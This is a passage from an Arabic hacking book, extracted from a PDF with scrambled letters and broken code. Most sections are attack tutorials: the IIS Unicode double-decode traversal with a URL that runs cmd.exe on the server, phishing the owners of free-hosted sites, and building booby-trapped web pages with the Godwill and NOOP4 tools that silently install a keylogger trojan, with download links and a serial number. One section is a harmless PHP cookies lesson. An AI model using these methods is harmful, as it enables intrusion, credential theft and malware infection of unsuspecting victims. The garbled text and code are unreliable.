* ؟- علمه الستفهام تخيلو حتى علمه الستفهام فى هذه الثغره لها دور فهذه العلمه تعنى الحاله التى ينفذ بها المر (طبعا مش فاهم يعنى ايه ) و ل يهمك تعالى معى افهمك يعنى ايه علمه الستفهام تعنى كلمه

argumentو هذه الكلمه هى التى تعنى الحاله التى سينفذ بها المر اى انه امر مثل ينفذ فى لحظه ثم مثل ام انه امر مثل ينفذ و لكن يستمر مفعوله و حقيقه ان طبعا معظم الوامر التىcopyينتهى مثل

يعنى ان المر ينفذ فى لحظه ثمc و هذا ال /argument /cنستخدمها هى الوامر العاديه و هى من نوع ينتهى

/?) و اضغطcmd بتاعك و اكتب هذا (cmd افتح ال 2000تعالى افهمك اكثر :: لو عندك ويندوز انتر ,سيظهر لك كلم كثير جداا و لكنى اخترت منه جزء بسيط فقط للتوضيح و انت عليك الباقى

شوف ايه الى راح يظهر لك ::Starts a new instance of the Windows 2000 command interpreter

CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF[/]]S] [/C | /K] string[

/C Carries out the command specified by string and then terminates/K Carries out the command specified by string but remains/S Modifies the treatment of string after /C or /K (see below(/Q Turns echo off/D Disable execution of AutoRun commands from registry (see below(

هذا جزء بسيط جداا مما راح يظهر لك و لكن تعالى نشوف هذا الجزء ايه معناه اول يقولك ::Starts a new instance of the Windows 2000 command interpreterو هذه

cmd و هذا طبعا وضح لنا ان كل 2000الجمله تعنى بالعربيه بدايه حاله جديده من مترجم ال ويندوز . و بعدها يظهر لناargumentsيمكن ان يتخكم صاحبه فى حالته حسب ما يفتح او يغلق ال

arguments/ كثيره و منها الذى نستعمله دائما فى الثغره و هو c:: شوفو كده ما المكتوب امامه Carries out the command specified by string and then terminatesو هذا

الكلم معناه انه ينفذ المر الموجود فى سطر الوامر ثم ينتهى و طبعا هذا للوامر العاديه التى نعرفها ل نراه فى ثغره اليونى كود و هو الargumentتعالو نشوف السطر الى تحتيه ::سوف نجد انه يتكلم عن

/k::شوفو ايه مكتوب امامه Carries out the command specified by string but remainsو طبعا معناه انه ينفذ

الوامر الموجوده فى السطر و لكن يستمر مفعولها (ما زلت ابحث عن اوامر مثل هذه و لكن هذا ما هو مثل )pingمكتوب امامى و لكن تقدر تقول انها الوامر التى تأخذ فتره طويله حبتين مثل

كما هو واضح فىecho و هذا نستخدمه فى اغلق تفعيل امر Q أخر مثل /argumentو مثل هناك المثال فوق

و طبعا منها ما هو اساسى ل يمكنك التحكم فيه (يعنى فتحه اوargumentsو هناك الكثير من هذه ال و بهذا تكون انت تتحكم بحاله الoff او on ) و هناك اخرين يمكنك ان تجعلهم k و ال /cغلقه مثل ال /

cmdخاصتك (ياريت تنفذ المر و تقرأ المكتوب لنك راح تلقى تفاصيل الفتح و الغلق بالتفصيل ) و فى خلل اسبوعين ان شاء ال تعالى و بعدMCSEاصبروا على قليل حتى انتهى من المتحان الول فى

ذلك نعود اكثر قوه و نشرح لكم هذه النقطه بالتفصيل ان شاء ال بس اصبرو شوى

141

Page 142: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

التى تكتبها فى الثغره و انا متأكد انك ل تعرفc و ما فائده /argumentsاعتقد انك الن فهمت ما هى ال معناها .

لنك تريد ان تتحكم بالموقع وcmd.exeتعالو نروح لنقطه سهله و بسيطه جدااا فى الثغره ,انت تشغل ال تغير الندكس و الخ و و لكن تعالى مثل نشغل اى ملف تانى ياترى كيف نشغله ؟

انا راح اقلك كيف ::كل ما عليك فعله هو ان تقوم بوضع اسم الفايل الذى تريد تشغيله بهذا الشكلPing.exe+PRINT بل من cmd.exe?/c و بهذا تكون قد شغلت الفايل الذى تريده

)enjoy this:: حيث تصبح الثغره بهذا الشكل. ( http://issserver/scripts/..%5c..%.../ping.exe+PRINT

/ *c/ و بالتالى كما عرفنا فوق انا - +c هى ال argumentلل cmd.exeاو الحاله التى سينفذ عليها فهى بمقام المسافه بين الكلمتين فى الثغره و لكن ل يمكنناc المر اما علمه ال + التى بجانب ال /cmdال

اسبدالها بمسافه عاديه و بعدها يكون المر الذى يحمله سطر الوامر لينفده ثم علمه + ثانيه و بعدها اسمالدرايف الذى تعرض محتوياته على الشاشه حاليا .

**و نأتى الن لهم نقطه فى الثغره و هى اساسا سبب الثغره كما ذكرنا فى اول الكلم (هو ان سبب الثغره و انا شخصيا افصل الديكودز علىdecodeيكون حل شفره العنوان اكثر من مره )و هذا ما نطلق عليه ال

اى تبسيط و فك المعادله تعالوsimplyfieyانه تحليل حتى نصل لبسط الحل كما فى الرياضيات يعنى خلينا نفهمكم هذا على الثغره نفسها ::

../%255c..%255c..../ هذا هو الديكود اى التحليل للصل ولكن ما الذى نحاول ان نفعله بهذه التحليلت الغريبه ؟

فنحن بذلك نحاول ان نحسن و نلعب فى مسارات الديريكتورز و لكن للسف ل يمكنك تغيير او اللعب فى على مثل هذه الديكودز و منعها من التنفيذ و هنا يقعcheck مزود بخاصيه عمل iisالديريكتورز لن ال

مزود فعلiisاصل ثغره اليونى كود و هو التحليل لمرتين او لكثر من مره فهمتم قصدى الن اى ان ال على هذه الديكودز و لكن انت تضع الثغره و بها اكثر من تحليل واحد لنفس اسم الموقعcheckبخاصيه ال

و المنع على الديكود الول و يظهر له ان كل شئcheck بوظيفته المعتاده و هى ال iisو لذلك يقوم ال مره واحده فتكونcheckبخير و انه يسيطر على الموقف خخخخخخخخ و لكن الحقسقه انه يعمل ال

النتيجه ان الديكود الثانى ينجح تماما فى محاوله اللعب فى الديريكتورز و بالتالى يكون نتيجه الديكود الثانى )slashهو ان يرجع الى اصله اى / (

و تعالو ندخل و نتعمق اكثر فى تفاصيل الديكود للثغره بعد ان عرفنا فكرتها :: HexaDecimal و الماده دى راح درس فيها شئ يسمى computer logicشوفو فيه ماده اسمها

Values و هذه ال valuesهى اساس الديكود الذى نفعله فى الثغره اى ان كل حرف صحيح او حركه تعالى اوضحلك اكثر ::hex valueمثل / فى الكمبيوتر لها ما يسمى بال

)space تعنى مسافه (20مثل: % المساويهhex valuesهذا مثال بسيط و اعتقد انك فهمت الن كلمى و طبعا يوجد جدول لهذه ال

hex valuesللحروف و الحركات العاديه فى الكمبيوتر , اذن اعتقد انك ادركت تماما الن انك ترسل عوضا عن الحروف و الحركات العاديه الى السرفر و هذا بالضبط ما نسميه التحليل او فك الشفره او ال

decode

) حيث انها منslashتعالى نخش فى تفاصيل الثغره اكثر و سنأخذ الحركه التى نشرح عليها هى ال / (اساسيات الديكود فى هذه الثغره ::

, طبعا هذا هو الديكود الول الذى ستفكر الن5c راح نجد ان ال / = %hex valueشوف فى جدول ال فتنجح الثغره و لكن انا اقول لك هذا خطأ لن هذا هوvalueفى انك تحذف ال / و تضع بدل منها هذا ال

الديقود الول و انا ذكرت ان الديكود يحدث مرتين او ممكن اكثر يعنى لو وضعت هذا الديكود الول فستجد ان حتىvalue لديه القدره على ان يمسك هذا الديكود و يمكنعه من التنفيذ و لذلك علينا ان نحلل هذا ال iisال

يتم الديكود التانى فتنجح الثغره

شوف نجد هذا ::hexadecimal valuesو بالنظر الى جدول ال = %%25

142

Page 143: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

5 = %35c = %63

بأننا حللنا ال شفره مرتين و بالتالى فسنحصل فى المقابلiis checkerو بالتالى نجد انفسنا قد خدعنا ال على الصل و هو / و بالتالى تكون قد نجحت الثغره .

فهمتم الن شباب معنى ديكود العنوان مرتين و فهمتم اساس الثغره و الديكود مرتين ليس معناه تكرار الى ابسط و اطول صوره ممكنهsimplifyالتحليل الول مرتين و لكن معناه تحليل و فك التحليل الول اى

فى نفس الوقت

و عشان توضح اكثر معك راح احطلك كيف التركيبه الصح للتحليل ::%255c %25 = % 5 = 5 c = c = %5c

%%35c % = % %35 = 5 c = c = %5c%%35%63 % = % %35 = 5 %63 = c = %5c

%25%35%63 %25 % = %35 = 5 %63 = c = %5c

=/5cثم : %

ارائيتم التحليل طبعا فى الخر يجب ان يساوى الديكود الصل و هو كما واضح فى مثالنا كل التحليلت تساوى%5c% 5 و كما ذكرناc و لكننا حللنا هذا الرمز الى اطول و ابسط تحليل حتى نخدع ال / = iis

checker. و فى النهايه بعد فهمنا للثغره و اساسها هيا تعالو نطبقها مع بعض

سوف نضع الثغره فى هذا الشكل ::http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s

sو ستدخلون على الموقع بنجاح و لكن اكيد تلحظون شئ جديد قد زاد على الثغره و هذا الشى هو +/هذا الرمز

و عندما تدمج هذا الرمز مع الثغره كما فى المثال السابق سوف تأتيك لسته بكل فايل كبير و صغير فىكمبيوتر الويب سرفر

و ال تعبت فى هذا الدرس و تعبت فى قرائه المعلومات و تجميعها عن اليونى كود حتى اصل لهذا الشكل (ادعولىMCSEالخوه و ان شاء ال انتظرو موضوعى القادم بعدما اكون انهيت امتحانى الول فى

و كيفيه اختراقها و فائده ال2000بالنجاح ) و سيكون عباره عن تلخيص للتعامل مع شبكات ويندوز WIN2000 RESOURCE KIT.

انتهى،،،

143

Page 144: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

" تدريب على عملية الختراق بواسطة اليونيكود "

<ةةةةةة: ةةةة ةةة >

بسم ال الرحمن الرحيم..

كثر الكلم عن إختراق المواقع بأنواعه واليوم عندي شرح عن الختراق عن طريق اليونيكود أو بالصح تطبيق عملي على كيفية الختراق عن طريق اليونيكود وهذا النوع يعتبر للمبتدئين وهو الذي بإذن ال

سيوصلهم إلى طريق الحتراف .....******************

بسم ال نبدأ... سيكون التطبيق على جهازك وهو مثل الموقع أو السيرفر وتقوم بتطبيق الدرس كما وأنك على موقع

مصاب.....

على جهازك . وفي نفس السيدي تبع النظام2000لكي تتدرب على إختراق المواقع قم بتركيب نظام ويندوز وذلك عن طريق :IISتقوم بإضافة سيرفر

* قم بالذهاب إلى لوحة التحكم.1* قم بالنقر على إضافة إزالة برامج.2* قم بالنقر على زر " إضافة إزالة مكونات ويندوز ".3”.IIS* قم بوضع علمة صح على الخيار الول “4

هذا بالنسبة لكيفية تنزيل السيرفر..اما عن كيفية التدرب على الجهاز أي اختراقه فقم بالتالي:ـ

طبعا هتدخل عليه بعد ما تشغلInetpubالموجود داخل مجلد wwwrootقم بوضع الموقع في مجلد عن طريقIISالسيرفر

http://127.0.01/ وليجاد الثغرة في الجهاز والتدرب عليها قم بتشغيل برنامج عمران سكان أو أي برنامج اخر للفحص عن

/http://127.0.0.1الثغرات تبع اليونيكود وقم بوضع العنوان تبعك الي هو وقم بتطبيق المهارات التي تعلمتها في اختراق المواقع المصابة باليونيكود.

انتهى،،،

144

Page 145: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

" شرح مفصل لكيفية اختراق المواقع المجانية "

<ةةةةة ةة ةةةةة ةةةةة>

>De\/iL Ni9hT <ةةةةةة:

سهوله اختراق المواقع المجانيه=- -=

نعم,,,ان اختراقها اسهل مماتتصور

الساسيات لختراق كل شي هو الكوكيز لنه يحتوي على جميع المعلومات((الموقع,,ايميل,,الخ))

ولكن يجب ان تعرف عده نقاط مهمه لختراق اي موقع مجاني

اول=-

يجب عليك معرفه نوعيه اصدار المتصفح

ثانيا=-

عليك معرفه بعض بيانات صاحب الموقع مثل اليميل..الخ وتستطيع التوصل له ببعض الطرق=-

ثالثا=-

عليك اول ايجاد الكواد الزمه لسرقه الكوكيز من المتصفح=-

لنــبدأ الشرح

النقطه الولى لمعرفه نوعيه اصدار المتصفح لصاحب الموقع سهله جدا فكل موقع يصمم على حسب نوعيه المتصفح الخاص بصاحبه ويكت لنا في نهايه الموقع يفضل تصفحه بدقه معينه ويعطيك اصدار الكسبلور

المناسب لتصفح الموقع=المناسب لتصميمه=نفس الصدار الخاص بهوهذه اسهل نقطه واهم شئ فيهالختراق المواقع المجانيه

واما بالنسبه للوصول الى الضحيه فهناك عده طرق ويجب ان يكون معاك اكواد الهتمل الخاصه بسرقه الكوكيز((ساضعها هنا لحقا))والن بعدما حصلت على هذه الكواد تضعها في صفحه وتحاول جذب الضحيه

للتوجه لها وهناك عده طرق

-تاخذ عنوان ماسنجر او ايميله من اي مكان في الموقع اذا وضعه وتحبه وتصير موثوق1 عنده((هههههههه حب مصلحه))وتعطيه صفحتك الى حطيت فيها الكوكيز او ترسل له ملف سارق الباسوورد

145

Page 146: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

-مثل تحدد نوعيه الشركه الى مقدمه الستضافه المجانيه للموقع فمثل اذا كان عنوان الموقع2http://www.name.8m.com/

وتستطيع معرفه النطاق المحددهFreeServerSفهذا معناه ان الموقع مقدم من شركه فري سيرفر ....الخ 8m.s5بالدخول الى المواقع المجانيه وعمل تسجيل وستظهر لك انواع الدوامين المتاحه((

وتسجل عندهم وسيرسلون لك البيانات ويكون لهم تصميم خاص جدا وانت عليك بسرقه نفس التصميم وتغيير محتوى الرساله((طبعا بالعنقليزي))وارسال رساله منه تتطلب منه فتح موقع((موقعك الى فيه

الكود))مثل لعمل التحديثات اواي شئ اخروهو لن يشك اذا رأى تصميم رسالتك وطريقتك نفس طريقه موقعالشركه وسيفتح الموقع حال

واذا لم يضع ايميله فهناك طريقه وهى انك مثل تدخل سجل الزوار عندهوتكتب شي يقهره و يجذبه بقوه يعني مثل تقول له تصميم موقعك مسروق حرفيا من هذا الموقع وتعطيه اللنك((وهو للمره المليون اقلكم الموقع الى فيه الكود))او اي طريقه اخرى من ذكائكواذا لم تجد ايميله او سجل زوار فهناك عليك اختراق الموقع

بالثغرات وهو صعب جدا جدا

النقطه الثالثه وهي الكوكيز=-

يطول شرحها عشان كدا بحط شرحه في موضوع تاني مرفق معاه الكواد الخاصه بالمتصفحات مع طريقهالتعامل معها لسرقه كوكيز الضحيه وتوصيله الى جهازك

IE 5 IE 5.5طريقه اختراق المواقع المجانيه التى اصحابها لديهم متصفح

هذه هي الطريقه التى تستعملها اذا استطعت الوصول الى صاحب الموقع ((راجع درس "سهوله اختراقالمواقع المجانيه"))

اول لن نعتمد على الكوكيز في سرقه الباسوورد وسنعتمد على تروجان قوي وخطير يسجل كل شي في الكيبوردوليكشفه النورتون انتي فايروس وهو الذي سنضعه في صفحه ملغومه اول مايفتحها الضحيه ينزل

الى جهازه,,,,

وهذا البرنامج يسجل كل شي بالكيبورد والشياء الى كنت تعمل بهاkeykey2000اول قم بتحميل برنامج ويرسلها على اليميل وانا مجربه وليستطيع النورتون الجديد والزرار الثلثه للغاء العمليات النشطه في

النظام ايقافه ووصلته

http://www.mikkotech.com/kk2000pro.exe

والسيريال نمبر

SN: K100-43-109-0-793218E876A4C9-29

والبرنامج سهل جدا ول يحتاج لشرح واذا اردتم شرحه كلمونيوالن بعدما جهزت ملف الباتش بهذا البرنامج ((هذه هي5.5 و 5وهو البرنامج الخاص للغام الموقع على انترنت اكسبلورgodwillقم بتحميل برنامج

سر المهنه))ووصلته

http://www.thecorpz.org/activex/gwpackage.zip

146

Page 147: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

====================الشــــرح=====================

انا لن اقوم بعمل شرح بالصور وهذا شرح بسيط للبرنامج لنه سهل جدا

عندما تفتح البرنامج ستظهر لك لوحه اختار منها

enter في السفل وستظهر لك القائمه والذى يهمنا منها

Upx ((اظننا خرجنا عن موضوعنا))وهذا لتشفير الباتش

Htmlوكل شغلنا هنا لكي نقوم بعمل صفحه ملغومه وعندما نضغط عليه تجي عده اختيارات وانت اختار منها

General options وستظهر لك مربع عرض الصفحات الملغومه وهذا شرح سريع لها

enter exe fileومن هنا تضع الباتش الى سويته بشرط ال يكون حجمه كبير جدا((هل تفيدنا هذه المعلومه في شئ))

enter html لستعراض صفحه من جهازك ثم الغامها وحط علمه صح جانبuse default page ليقوم البرنامج بعمل صفحه جديده

ليقومDoneوهنا تضع اسم الصفحه وبعد النتهاء من ذلك نختار كلمه HTA File Nameوفي السفلالبرنامج بعمل الصفحه((وسيكون مكانها في نفس مجلد البرنامج))

وارجو ان يكون الشرح واضحا

واذا واجهت مشكله مع البرنامج توجه الى هذا الموقع

http://www.thecorpz.org/html/activesploits.html

===================نهايه الشـــرح====================

وبعدما تقوم بوضع الصفحه الملغومه في النت واعطائها للضحيه بالطرق التى شرحتها سابقا سينزل التروجان على جهازهعندما يقوم بفتح موقعك الملغوم ولم يبقى لك الن انت تنتظر في بريدك الى حطيته في التروجان المعلومات عن الضحيه مثل((الموقع واليميل,,الخ))وهذه الطريقه تنفع ايضا لسرقه الشتراكات

واساميه في المنتديات وايميله.

147

Page 148: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

انتهى،،،

" درس مفصل عن الكوكيز "

<ةةةةة ةة ةةةةةةة ةةةةة ةةةةةة>

>Linux Girl <ةةةةةة:

مقدمة ) من الوسائل المفيدة في انشاء مواقع اكثر تفاعلية ، فبواسطتها ستتمكن منcookiesتعد الكعكات ( الـ

معرفة هل قام المتصفح بزيارة موقعك من قبل ام ل ..

في هذا الدرس سنتعرف على الكعكات و كيف يمكننا استخدامها ...

اقسام الدرس :- معلومات عامة .1- زراعة الكعكات على جهاز العميل .2- قراءة الكعكات من جهاز العميل .3- تطبيق : تخصيص لون الخلفية .4

معلومات عامة

- ما هي ملفات الكوكيز ؟ ملفات الكوكيز عبارة عن ملفات نصية ، تقوم المواقع التي تزورها بإيداعها على القرص الصلب في

جهازك ، وتحتوي هذه الملفات النصية على معلومات تتيح للموقع الذي أودعها أن يسترجعها عند الحاجة ،أي عند زيارتك المقبلة للموقع .

وتختلف المعلومات التي تخزن ضمن ملفات الكوكيز من موقع لخر ، ولكن ليس بإمكان هذه المواقع استرجاع أي معلومات إضافية عنك أو عن جهازك ، باستثناء تلك المعلومات المخزنة في الملف النصي

الخاص بها ، والتي تم إرسالها من قبل الموقع ، وبذلك ل تستطيع هذه المواقع الطلع على مضمون ملفاتالكوكيز الخرى ، أو أي ملفات خاصة على جهازك .

- كيف يتم إيداع ملفات الكوكيز على جهازك ؟ يرسل المتصفح ، عند إدخالك عنوان موقع في شريط العناوين ، طلبا إلى الموقع الذي حددته ، متضمنا

الخاص به ، ونوع المتصفح الذي تستخدمه ، ونظام التشغيل الذي يدير جهازك . تخزن هذهIPعنوان ، ول علقة للكوكيز بالمعلومات التي يتم إرسالها . وفيLog Filesالمعلومات في ملفات خاصة بالمزود

الوقت ذاته يبحث المتصفح عن ملفات كوكيز ، التي تخص الموقع المطلوب ، فإذا وجدها يتم إرسالها مع طلب مشاهدة الموقع ، وإذا لم توجد ، فإن الموقع سيدرك أن هذه زيارتك الولى إليه ، فيقوم بإرسال ملفات

الكوكيز إلى جهازك لتخزن عليه .

وبإمكان الموقع تغيير المعلومات الموجودة ضمن ملفات الكوكيز أو إضافة معلومات جديدة كلما قمت بزيارة الموقع . يتم تخزين بعض ملفات الكوكيز في الذاكرة فقط ، بحيث يجري حذفها مباشرة عند إغلقك

المتصفح ، ولكن معظمها وتسمى "ملفات الكوكيز المثابرة"، يتم تخزينها لفترة محددة على القرص الصلب لحين انتهاء صلحيتها وقد تدوم صلحيتها مدة أشهر أو حتى سنوات . أما بعض ملفات الكوكيز التي تعرض

148

Page 149: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

تاريخ صلحية لتاريخ سابق ، فإنها تحذف مباشرة ول تخزن على قرصك الصلب . وتعود المعلومات المخزنة في ملفات الكوكيز إلى مزودات الموقع الذي أصدرها فقط ، وقد تعمم بعض الشركات الكبرى ملفات الكوكيز التي تصدرها على جميع مزوداتها ، لتنسيق المعلومات المتضمنة ، ولكي ل تصدر كل من مزوداتها ملفات

كوكيز للمستخدم ذاته ، عند زيارته لصفحات مختلفة في الموقع .

- مكونات ملف الكوكيز :يتكون عادة من عدة اجزاء هي اسم الملف ، قيمته ، تاريخ انتهاء مفعوله ، الموقع المالك له ...

زراعة الكعكات على جهاز العميل

أول : كيف تزرع ملفات الكعكات : و تعريفها بالشكل التالي :setcookieيتم ذلك باستخدام الدالة

code:

boolean setcookie ( string name [, string value [, int expire

,]string path [, string domain [, int secure([[[[[

تهمنا المدخلت الثلث الولى و هي :nameاي اسم الكعكة ... فبامكانك ارسال اكثر من كعكة الى متصفح واحد و عندها يصبح السم هو :

الطريقة الوحيدة للتمييز .

valueالقيمة ... فقط قيم نصية ... ل يمكنك وضع مصفوفة كقيمة و هذا أامر مهم ... لكن انتبه بامكانك : لتحويل اي متغير في بي اتشserializeوضع مصفوفة لكن بطريقة اخرى ... ؟ كيف ؟ : استخدم الدالة

لعادته الى الشكل الطبيعي .unserializeبي الى شكل نصي و من ثم استخدم

expire ) و التي بعدها سيقوم المتصفح على1970 يناير 1 : اي عدد الثواني من بدية عصر اليونكس ( جهاز المستخدم بحذف الكعكة ... و هنا ثلث حالت :

--> أول : أن يكون الوقت المعطى كمدخل اكثر من الوقت الحالي على جهاز العميل و عندها تخزن الكعكةعلى جهاز العميل و تحذف عند انقضاء المدة .

--> ثانيا : أن يكون الوقت المعطى كمدخل اقل من الوقت على جهاز العميل و عندها ل يقوم المتصفح علىجهاز العميل بتخزينها و اذا وجدت كعكة بنفس السم فانه يحذفها حتى لو لم تنتهي المدة .

--> ثالثا : إذا لم تحدد وقتا فان الكعكة تخزن في ذاكرة المتصفح و تفقد حالما يغلق المستخدم الموقع .

مثال :code:

?>

setcookie('site','http://www.palhackerz.com/',time()+3600 ;(

<?

و التي ترجع الوقت الحالي على شكل عدد الثواني من بداية عصر اليونكس (timeمن الدوال المفيدة دالة

149

Page 150: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

) .1970 يناير 1

ثانيا كيف تحذف او تعدل كعكة: لكي تحذف كعكة عليك أن ترسل كعكة بنفس السم و خالية القيمة و ذات وقت اقل من الوقت على جهاز

المستخدم

مثال :code:

?>

setcookie('site','',time()-360000 ;(

<?

ملحظات : - عندما تحدد زمنا ماضيا اجعله قيمة كبيرة لكي تتفادى فارق التوقيت بين الخادم و العميل .1- لكي تعدل أي كعكة عليك حذفها و إرسالها من جديد .2

ملحظة مهمة : قبل أن ترسل اي شيء الى المتصفح .. فمثل الكود التالي لن ينجح :setcookieيجب ان تستدعي الدالة

code:>html <

>body <

?>

setcookie('site','palhackerz.com',time()+20000 ;(

echo " Alfjr.com : the best islamic forum ;"

<?

/>body <

/>html <

...setcookieبل لو كان هنالك مجرد سطر فارغ قبل علمة البداية ?> فلن تعمل الدالة

المثال السابق كان من الممكن ان يكون :code:

?>setcookie('site','palhackerz.com',time()+20000 ;(

<?

>html <

150

Page 151: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

>body <

?>echo " palhackerz.com : the best Hacking forum <? ;"

/>body <

/>html <

قراءة الكعكات من جهاز العميل

- كيف تستقبل المتغيرات من الكعكة :كما قلنا بانه بامكانك ارسال اكثر من كعكة الى متصفح واحد ..

عندما يطلب المستخدم من متصفحه صفحة على موقعك فان المتصفح يقوم بارسال جميع الكعكات التي قمت تسهل عليك قراءة هذه الكعكات و تخزنها في مصفوفة اسمهاPHPانت بزراعتها عند المستخدم ...

COOKIE و هي مصفوفة من النوع $_Associative Arraysبحيث ان المفتاح هو اسم الكعكة و القيمة قيمة الكعكة كما ارسلتها .

مثال :code:

?>

echo $_COOKIE['site ;['

<?

و هذه تطبع : code:

palhackerz.comتطبيق : تخصيص لون الخلفية

كمثال بسيط دعنا نقوم بانشاء موقع مبسط و نستخدم الكعكات لكي نحفظ لون الخلفية المحببة الى الشخص ..

- ماذا لدينا ؟ : يقوم الملف بعمليتين :user.php- الملف 1

--> الولى : تحديد اللون الذي اختاره الزائر .--> الثانية : عرض نموذج اختيار الللون و حفظ اللون المختار

.user.php إحدى صفحات الموقع و التي تستفيد من خدمات الملف index.php- الملف 2

وإليك الكود الخاص بكل ملف : :user.php- الملف 1

code: ?>

-----------------------*/

151

Page 152: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Cookies-Based Background Selector ..

Created By : "Rasha"<[email protected] <

For : h4palestine.com

/*-------------------------

function display_form }()

<?

>html <

>body <

--!>Color setting Form <--

>form name=color_select method="GET <"

>INPUT type="hidden" name="do" value="set_color <"

>INPUT name="color" type="text" value "=

?>echo get_color <"<? ;()

>INPUT type="submit" value <"احفظ اللون"=

/>FORM <

--!>Color Clearing Form <--

>form name=color_clear method="GET <"

>INPUT type="hidden" name="do" value="clear_color <"

>INPUT type="submit" value <"ل تتذكر لوني المفضل"=

/>FORM <

?>

{

152

Page 153: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

function set_color }()

global $_GET ;

setcookie('color',$_GET['color'],time()+36000 ;(

header('Location:index.php ;('

{

function get_color }()

global $_COOKIE ;

if(isset($_COOKIE['color }((['

return $_COOKIE['color ;['

{else }

return "#FFFFFF ;"

{

{

function clear_color }()

setcookie('color',$_GET['color'],time()-36000 ;(

header('Location:index.php ;('

{

//selection

if ($do=='display_form }('

display_form ;()

153

Page 154: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

{elseif ($do=="set_color }("

set_color ;()

{elseif ($do=="clear_color }("

clear_color ;()

{

<?

تقوم فقط بعرض نموذج اختيار اللون .display_form- الدالة الولى تقوم بحفظ اللون المختار في كعكة و ترجع المستخدم الى الصفحة الرئيسية .set_color- الدالة الثانية ترجع قيمة اللون من الكعكة و اذا لم يكن هنالك قيمة فانها ترجع لون افتراضيget_color- الدالة الثالثة وهو البيض .

تقوم بمسح الكعكة بالطريقة التي ذكرناها في الدرس .clear_color- الدالة الرابعة

: index.php- ملف الـ 2 كما يلي :user.php من ملف get_colorملف عادي جدا ال انه يطلب الدالة

code:>html <

>BODY bgcolor="<? include('user.php ;('

echo get_color <"<? ()

>h1/>..... مرحبا بك<h1 <

>br <

يمكنك تخصيص لون الخلفية من هنا

>br <

>a href="user.php?do=display_form/>صفحة تخصيص اللون <"a <

/>body <

/>html <

انتهى،،،

154

Page 155: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

في تلغيم الصفحات "God Will" شرح برنامج السطورة

<ةةةةة ةة ةةةةة ةةة ةةة><ةةةةةة: ةة ةةةة>

كل ما يلزمنا هو : الذي تريد تلغيمه.html** ملف الــ

بايت )34** ملف الباتش الذي تريد وضعه في الصفحة.( يجب أن يكون أقل من لتلغيم الصفحة.Godwill** برنامج السطورة

و تجد هذا البرنامج في اللينك التالي:

155

Page 156: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

http://www.geocities.com/love2002_il/godwill16.zip

tlsecurityو السيريال نامبر:

لنبدأ: بعد تحميل، و ستجدGodwill المراد تلغيمه، و ملف الباتش، شغل برنامج htmlبعد تجهيز ملف الــ

أمامك النافذة التالية...

لتجد نفسك في النافذة التالية...htmlاضغط على زر

156

Page 157: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

لتنتقل للنافذة التالية...General Optionsاضغط على الخيار

Doneاتبع التعليمات الموجودة في هذه النافذة، و من ثم اضغط الزر بعدها ستنتقل إلى النافذة التالية...

157

Page 158: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Genاضغط زر ... و هذاenter Output 3سيظهر لك في مجلد البرنامج ملف له نفس السم الذي وضعته في الحقل رقم

الملف يمثل الصفحة الملغومة... قم بتحميل الصفحة على إحدى المواقع المستضيفة للصفحات مثل

http://www.tripod.lycos.co.uk/...و احتفظ بعنوان صفحتك الملغومة جيدا عند فتح الضحية لصفحتك الملغومة... سيقوم الباتش بتحميل نفسه بنفسه بدون أن يحس الضحية بأي شيء

) و عند إعادته لتشغيل الكمبيوتر، سيقوم الباتش بتشغيل نفسه... وzone Alarm( طبعا إل إذا كان لديه ستصلك رساله منه برقم أي بي جهاز الضحية و رقم البورت الذي تم فتحه...

و هون بقى ، أنت بتعرف شغلك.

انتهى،،،

158

Page 159: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ا للبرنامج السطورة ومرحبا ببرنامج "NOOP4" وداع

<ةةةةة ةة ةةةةة ةةةةة>

>®.§¤MoHfOx ¤§.®<ةةةةةة:

لكنه خفيف جدا .god willوهو ل يرتقى إلى مستوى

..godwillول يجعلك ترتبط لحجم معين مثل برنامج

هذا البرنامج من اجل دمج بالباتش وتهيئة علي اساس انه صفحه علي النت noob 4.0اسم البرنامج هو

من ااجل عيون الجوكر والجميع ====================================================================

- البرنامج 1 الصوره توضح ما هوالشرح عند ضغطك علي البرنامج وفتحه سوف تاتي هذه الشاشه

=======================================

=============================2 layout<<<<====:::للبرنامج

اجزاء6هو خاص بتكوينات الصفحه وينقسم الي

Internet Explorer 5- خاصه بتكوين الصفحه لمستخدمي 2Internet Explorer5.5- خاص بتكوين الصفحه لمستخدمي 3 هما الي تحديد نوع الملفات المستخدمه في الدمج 5و4 - هي ما سوف يقوم البرنامج بدمجه مع الصفحه من ملفات6

159

Page 160: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

=====================================================================

3 executable file<<<<====::: لختيار الباتش - لتحديد مكان الباتش من علي الجهاز 7

- للبداء في تكوين الباتش 8=======================================

=============================- هو اخر المطاف هو انهاء العدادت لتكوين الباتش مع الصفحه:::====>>>>9

160

Page 161: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

وفي نهايه عمل البرنامج يعطي لك المكان الذي تريد ان يحفظ في الصفحه المدموجه.

وصلة البرنامج...

انتهى،،،

161

Page 162: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

" معلومات مهمة عن المواقع التي تدعم الفرونت بيج "

<ةةةةة>

